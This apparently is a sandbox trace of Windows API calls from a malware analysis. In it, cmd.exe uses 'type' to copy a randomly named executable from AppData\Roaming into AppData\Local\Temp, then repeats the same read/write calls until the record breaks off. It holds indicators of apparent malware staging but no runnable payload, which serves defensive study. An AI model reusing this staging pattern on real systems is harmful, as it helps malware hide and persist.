GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="1") returned 2 [0111.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0111.781] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0111.782] GetConsoleTitleW (in: lpConsoleTitle=0x3a0aa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.782] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0111.782] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0111.782] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0111.782] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0111.782] _wcsicmp (_String1="type", _String2=")") returned 75 [0111.783] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0111.783] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0111.783] _wcsicmp (_String1="IF", _String2="type") returned -11 [0111.783] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0111.783] _wcsicmp (_String1="REM", _String2="type") returned -2 [0111.783] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0111.786] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 68 [0111.786] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 68 [0111.786] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 71 [0111.786] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 71 [0111.786] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 80 [0111.786] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 80 [0111.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.789] GetFileType (hFile=0x7) returned 0x2 [0111.789] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.789] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf47c | out: lpMode=0x1cf47c) returned 1 [0111.789] _dup (_FileHandle=1) returned 3 [0111.789] _close (_FileHandle=1) returned 0 [0111.789] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", _String2="con") returned -53 [0111.789] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf44c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0111.790] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0111.790] GetConsoleTitleW (in: lpConsoleTitle=0x1cf27c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.790] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0111.790] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0111.790] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0111.790] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0111.791] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.791] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x1cede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cede0) returned 0x3b21d0 [0111.791] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0111.791] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0111.791] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0111.791] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cdcec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0111.792] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0111.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.792] GetFileType (hFile=0x54) returned 0x1 [0111.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.792] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1cdd44 | out: lpFileSizeHigh=0x1cdd44*=0x0) returned 0x7d600 [0111.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.792] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.792] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.792] GetFileType (hFile=0x4c) returned 0x1 [0111.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.792] GetFileType (hFile=0x4c) returned 0x1 [0111.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.792] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] GetFileType (hFile=0x4c) returned 0x1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] GetFileType (hFile=0x4c) returned 0x1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] GetFileType (hFile=0x4c) returned 0x1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] GetFileType (hFile=0x4c) returned 0x1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.794] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.795] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.796] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.797] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.798] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 